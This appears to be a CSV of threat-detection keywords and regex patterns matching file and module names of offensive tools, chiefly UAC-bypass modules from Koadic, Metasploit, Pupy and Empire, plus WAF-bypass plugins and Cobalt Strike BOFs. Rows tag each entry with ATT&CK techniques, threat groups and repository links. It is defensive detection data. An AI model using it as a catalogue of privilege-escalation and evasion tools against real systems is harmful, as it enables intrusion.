"*bypassuac_compmgmtlauncher*",".{0,1000}bypassuac_compmgmtlauncher.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36488"
"*bypassuac_eventvwr*",".{0,1000}bypassuac_eventvwr.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36489"
"*bypassuac_fodhelper*",".{0,1000}bypassuac_fodhelper.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36490"
"*bypassuac_injection*",".{0,1000}bypassuac_injection.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36491"
"*bypassuac_injection.*",".{0,1000}bypassuac_injection\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36492"
"*bypassuac_injection.rb*",".{0,1000}bypassuac_injection\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36493"
"*bypassuac_injection_winsxs.rb*",".{0,1000}bypassuac_injection_winsxs\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36494"
"*bypassuac_registry.*",".{0,1000}bypassuac_registry\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","36495"
"*bypassuac_sdclt*",".{0,1000}bypassuac_sdclt.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36496"
"*bypassuac_silentcleanup.rb*",".{0,1000}bypassuac_silentcleanup\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36497"
"*bypassuac_slui*",".{0,1000}bypassuac_slui.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36498"
"*bypassuac_sluihijack.*",".{0,1000}bypassuac_sluihijack\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36499"
"*bypassuac_systempropertiesadvanced*",".{0,1000}bypassuac_systempropertiesadvanced.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36500"
"*bypassuac_token_imp.*",".{0,1000}bypassuac_token_imp\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","36501"
"*bypassuac_vbs.*",".{0,1000}bypassuac_vbs\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36502"
"*bypassuac_windows_store_reg.rb*",".{0,1000}bypassuac_windows_store_reg\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36503"
"*bypassuac_wsreset*",".{0,1000}bypassuac_wsreset.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36504"
"*BypassUAC-ETV.exe*",".{0,1000}BypassUAC\-ETV\.exe.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","1","N/A","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","36505"
"*BypassUACTokenManipulation*",".{0,1000}BypassUACTokenManipulation.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1122","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","36506"
"*bypassuac-x64.dll*",".{0,1000}bypassuac\-x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36507"
"*bypassuac-x64.exe*",".{0,1000}bypassuac\-x64\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36508"
"*bypassuac-x86.dll*",".{0,1000}bypassuac\-x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36509"
"*bypassuac-x86.exe*",".{0,1000}bypassuac\-x86\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36510"
"*bypasswaf.jar*",".{0,1000}bypasswaf\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","36511"
"*bypasswaf.jar*",".{0,1000}bypasswaf\.jar.{0,1000}","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/codewatchorg/bypasswaf","1","1","N/A","network exploitation tool","N/A","4","331","104","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z","36512"
"*bypasswaf.py*",".{0,1000}bypasswaf\.py.{0,1000}","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/codewatchorg/bypasswaf","1","1","N/A","network exploitation tool","N/A","4","331","104","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z","36513"
"*byt3bl33d3r/BOF-Nim*",".{0,1000}byt3bl33d3r\/BOF\-Nim.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","N/A","10","10","84","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z","36514"
"*byt3bl33d3r/DeathStar*",".{0,1000}byt3bl33d3r\/DeathStar.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","36515"
